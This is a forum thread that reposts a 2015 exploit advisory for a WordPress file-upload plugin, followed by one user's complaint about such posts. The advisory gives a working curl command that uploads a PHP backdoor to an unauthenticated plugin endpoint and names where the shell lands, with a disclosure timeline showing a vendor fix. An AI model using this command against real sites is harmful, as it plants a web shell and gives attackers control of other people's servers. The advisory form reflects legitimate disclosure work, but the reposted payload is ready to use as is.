KhiZaRix Posted April 6, 2015 Report Posted April 6, 2015 ####################### Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability# Exploit Author : Claudio Viviani# Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip# Date : 2015-03-14# Tested on : Linux BackBox 4.0 / curl 7.35.0####################### Description:Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.####################### Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php####################### PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php# Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php####################### Vulnerability Disclosure Timeline:2015-03-14: Discovered vulnerability2015-04-03: Vendor Notification2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3)2014-04-04: Public Disclosure #####################Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww#####################Source: http://packetstorm.wowhacker.com/1504-exploits/wpworktheflow252-shell.txt Quote
amkulcsar Posted April 6, 2015 Report Posted April 6, 2015 bai nu mai pune deastea, ca eu vreau sa-mi fac un site, si ma trezesc cu el spart sau cu un deface sau ceva Quote